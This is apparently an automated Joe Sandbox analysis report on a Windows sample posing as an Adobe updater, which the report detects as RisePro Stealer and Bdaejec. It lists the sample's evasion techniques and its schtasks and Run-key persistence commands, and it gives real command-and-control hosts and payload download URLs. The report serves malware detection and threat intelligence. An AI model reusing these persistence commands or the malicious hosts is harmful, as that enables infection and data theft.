Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AdobeUpdaterV131.exe

Overview

General Information

Sample name:AdobeUpdaterV131.exe
Analysis ID:1480703
MD5:0bfb030dcbf461f2c76087e4b9856836
SHA1:75425a8dc79a21373520a241a7c51d9a1ce7e91a
SHA256:bdb5f42b5e4709134a4f963b9648af4f8e19e2011937f72ff3b75488887e3f14
Tags:exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • AdobeUpdaterV131.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\AdobeUpdaterV131.exe" MD5: 0BFB030DCBF461F2C76087E4B9856836)
    • xRp.exe (PID: 6568 cmdline: C:\Users\user\AppData\Local\Temp\xRp.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • schtasks.exe (PID: 7192 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7240 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MPGPH131.exe (PID: 7416 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 0BFB030DCBF461F2C76087E4B9856836)
  • MPGPH131.exe (PID: 7428 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 0BFB030DCBF461F2C76087E4B9856836)
  • RageMP131.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 0BFB030DCBF461F2C76087E4B9856836)
  • RageMP131.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 0BFB030DCBF461F2C76087E4B9856836)
    • xRp.exe (PID: 8120 cmdline: C:\Users\user\AppData\Local\Temp\xRp.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 2080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
          0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            Click to see the 12 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AdobeUpdaterV131.exe, ProcessId: 6616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
            No Snort rule has matched
            Timestamp:2024-07-24T23:02:23.672844+0200
            SID:2807908
            Source Port:49751
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:02:02.179085+0200
            SID:2046269
            Source Port:49732
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:21.179501+0200
            SID:2807908
            Source Port:49749
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:02:06.867202+0200
            SID:2046269
            Source Port:49738
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:06.867241+0200
            SID:2046269
            Source Port:49737
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:50.529437+0200
            SID:2022930
            Source Port:443
            Destination Port:49754
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:01:54.455790+0200
            SID:2807908
            Source Port:49730
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:01:59.210478+0200
            SID:2049060
            Source Port:49732
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:13.192674+0200
            SID:2022930
            Source Port:443
            Destination Port:49745
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:24.179265+0200
            SID:2046269
            Source Port:49750
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:16.085891+0200
            SID:2046269
            Source Port:49747
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T23:02:13.348213+0200
            SID:2028371
            Source Port:49746
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-24T23:02:30.315987+0200
            SID:2807908
            Source Port:49753
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:01:59.277372+0200
            SID:2807908
            Source Port:49731
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:02:18.300399+0200
            SID:2807908
            Source Port:49748
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:02:26.815817+0200
            SID:2807908
            Source Port:49752
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T23:01:53.959653+0200
            SID:2838522
            Source Port:54770
            Destination Port:53
            Protocol:UDP
            Classtype:Malware Command and Control Activity Detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: AdobeUpdaterV131.exeAvira: detected
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarUaAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar8Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarC:Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarsC:Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarcC:Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.raryYAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarXY$$mAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rar7Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k5.rar?YAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net/vAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rar)XAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarcag$Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rar1bAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarqAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$mAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarUAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarsAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarsC:Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarhgAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarMpAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarC:Avira URL Cloud: Label: phishing
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
            Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
            Source: AdobeUpdaterV131.exeJoe Sandbox ML: detected
            Source: AdobeUpdaterV131.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

            Spreading

            barindex
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_004E29E2
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,15_2_00E329E2
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_004E2B8C
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 799
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
            Source: global trafficTCP traffic: 192.168.2.4:49732 -> 193.233.132.62:50500
            Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_0063D620 recv,WSAStartup,closesocket,socket,connect,closesocket,0_2_0063D620
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
            Source: xRp.exe, 00000001.00000003.1658769932.0000000000520000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmp, xRp.exe, 0000000F.00000003.1890235266.0000000000B60000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
            Source: xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
            Source: xRp.exe, 00000001.00000002.1856041634.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/v
            Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
            Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1b
            Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar7
            Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m
            Source: xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarS
            Source: xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarU
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarUa
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcag$
            Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarhg
            Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
            Source: xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarsC:
            Source: xRp.exe, 00000001.00000002.1856041634.000000000091E000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
            Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
            Source: xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarC:
            Source: xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarMp
            Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarcC:
            Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarq
            Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raryY
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
